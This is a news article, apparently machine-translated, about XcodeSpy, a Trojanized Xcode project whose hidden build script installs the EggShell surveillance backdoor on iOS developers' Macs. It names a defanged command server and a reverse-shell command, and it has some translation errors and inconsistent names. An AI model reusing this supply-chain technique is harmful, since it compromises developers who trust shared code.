Researchers said they found a Trojanized code library in the wild that is trying to install advanced surveillance malware on iOS software developers' Macs.
It was a malicious project that the attacker wrote for Xcode, a developer tool that Apple developers who write apps for iOS or another Apple operating system make available free of charge. The project was a copy of TabBarInteraction, a legitimate open source project that makes it easy for developers to animate iOS tab bars based on user interaction. An Xcode project is a repository for all of the files, resources, and information needed to build an app.
Walk on eggshells
Next to the legitimate code was a disguised script known as a "run script". The script, which ran every time the developer build was launched, contacted an attacker-controlled server to download and install a custom version of EggShell, an open source backdoor that spies on users through a microphone, camera, and keyboard.
Researchers at SentinelOne, the security firm that discovered the Trojanized project, have named it XcodeSpy. They say they discovered two flavors of the customized EggShell that were deleted by the malicious project. Both were uploaded to VirusTotal from Japan via the web interface, the first on August 5th and the second on October 13th.
"The later sample was also found in the wild on a victim's Mac in the United States at the end of 2020," SentinelOne researcher Phil Stokes wrote in a blog post on Thursday. “For reasons of confidentiality, we cannot provide any further details about the ITW incident [in the wild]. However, the victim reported that they have been repeatedly attacked by North Korean APT actors and the infection came to light as part of their regular threat hunting activities. "
So far, only one case from a US-based organization is known to the company's researchers. Evidence from the SentinelOne analysis suggests that the campaign "was operational between at least July and October 2020 and may also have targeted developers in Asia".
Thursday's post came two months after Microsoft and Google researchers said that North Korean government-sponsored hackers were actively trying to infect security researchers' computers. To gain the researchers' trust, the hackers spent weeks building Twitter personas and building working relationships online.
Eventually, the fake Twitter profiles prompted researchers to use Internet Explorer to open a webpage. Those who took the bait found that their fully patched Windows 10 computer had a malicious service and an in-memory backdoor installed. Microsoft fixed the vulnerability last week.
In addition to the watering hole attack, the hackers sent targeted developers a Visual Studio project that allegedly contained source code for a proof-of-concept exploit. The project contained custom malware that contacted the attackers' control server.
Seasoned developers have long known the importance of checking for malicious execution scripts before using a third-party Xcode project. While the scripts are not difficult to recognize, XcodeSpy has tried to make the job more difficult by coding the script.
During the decoding it was clear that the script contacted a server at cralev [.] Me and sent the mysterious command mdbcmd via a reverse shell built into the server.
The only warning a developer would get after running the Xcode project looks like this:
SentinelOne provides a script that developers can use to easily find run scripts in their projects. Thursday's post also includes indicators of tradeoffs that developers can use to find out if they have been targeted or infected.
A vector for malice
It's not the first time Xcode has been used in a malware attack. In August last year, researchers discovered Xcode projects available online that contained exploits for two Safari zero-day vulnerabilities. As soon as one of the XCSSET projects was opened and created, according to a TrendMicro analysis, the malicious code was executed on the developers' Macs.
And in 2015, researchers found 4,000 iOS apps infected with XcodeGhost, the name of a compromised version of Xcode that was mainly distributed in Asia. Apps compiled with XcodeGhost can be used by attackers to read and write to the device's clipboard, open specific URLs, and exfiltrate data.
Unlike XcodeGhost, which infected apps, XcodeSpy targeted developers. Given the quality of the installed monitoring backdoor XcodeSpy, it would not be difficult for the attackers to distribute malware to users of the developer software as well.
"There are other scenarios with such high-value victims," wrote SentinelOne's Stentin. “Attackers could simply search for targets of interest and collect data for future campaigns, or they could try to collect AppleID credentials for other campaigns that use malware with valid Apple Developer code signatures. These proposals are neither exhaustive nor mutually exclusive. "